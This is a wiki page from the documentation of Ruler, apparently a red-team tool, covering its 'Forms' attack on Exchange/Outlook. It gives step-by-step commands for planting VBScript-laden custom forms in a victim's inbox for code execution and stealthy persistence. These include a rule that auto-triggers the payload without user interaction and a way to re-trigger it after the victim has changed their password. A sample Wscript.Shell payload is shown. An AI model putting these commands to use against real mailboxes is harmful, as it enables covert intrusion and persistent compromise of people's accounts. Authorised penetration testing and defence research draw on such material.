-
Notifications
You must be signed in to change notification settings - Fork 359
Forms
Ruler can also get shell through custom forms. This is especially useful for persistence, as a form can lie dormant in the inbox, nearly undetectable.
The basic premise behind forms is explained in the Outlook forms and shells.
To access the Forms option, you need to use the form command. There are multiple sub-commands to forms:
If you use the forms attack, you need to ensure that the templates folder is present in the current working directory. Ruler will need the files contained in this directory. Please copy the following files into it:
- img0.bin
- img1.bin
- formstemplate.bin
- formsdeletetemplate.bin
You can view all existing forms using the display
command. This fetches the list of existing forms from the exchange server and provides you with the full form name.
./ruler --email [email protected] form display
Unlike Rules, forms don't require a WebDAV instance and VBScript can be executed directly. A sample VBScript entry would be:
CreateObject("Wscript.Shell").Run "calc.exe", 0, False
The script needs to be supplied in either a file, or on the command line. To create a custom form:
./ruler --email [email protected] form add --suffix superduper --input /tmp/command.txt --send
This will create a new form, of message class IPM.Note.superduper and use the script found in /tmp/command.txt as the VBScript to execute. Using --send
simply task Ruler to send an email to the user, using their own account, and ensuring the correct message class is set (which triggers the form).
To trigger an existing form, you don't need send the email from the account that the form was created on. This is great for persistence, you simply need to have a valid Exchange based account (outlook.com is great) and know the suffix used for the form.
./ruler --email [email protected] form send --target [email protected] --suffix superduper
Nick Landers (@monoxgas) found that a form without event triggers, would call the VBScript payload on delete. This delete can be automated by creating a client-side rule to delete the message as it arrives in the mailbox.
This is a great way to auto-trigger the form, without requiring any user interaction. Ruler can automate this for you if you supply the --rule
flag:
./ruler --email [email protected] form add --suffix superduper --input /tmp/command.txt --rule --send
This is a great, stealthy attack that works on all instances of Outlook upto and including 2016.
If you don't want to use the built in template with the Item_Open triggers etc, you can supply a raw script by using the --raw
option. This will simply insert your supplied VBScript directly into an empty script template.
Deleting an existing is done in a similar way to deleting rules.
./ruler --email [email protected] form delete --suffix superduper
If the form has a rule associated with it (you used --rule
when creating the form), Ruler will detect the rule and offer to delete it for you.
Forms has it's own send command that can be used to trigger a form. This is great for triggering a form, which was created for persistence. You can even send the email from another account.
To send a message to trigger a form:
./ruler --email [email protected] form send --prefix superduper
You can optionally provide a custom subject, body and target.
- --subject - this allows you to provide a string with a custom signature
- --body - provide a custom email body
- --target - send the email to another user
Let's imagine you created a form called superduper in the inbox of the user [email protected]. You've subsequently lost access to the inbox, as the user changed their password. You can still trigger the form, as long as you've got an Exchange server to send the email from.
./ruler --email [email protected] form send --prefix superduper --subject "Hi Koos" --body "Hi Koos,\nJust checking in." --target [email protected]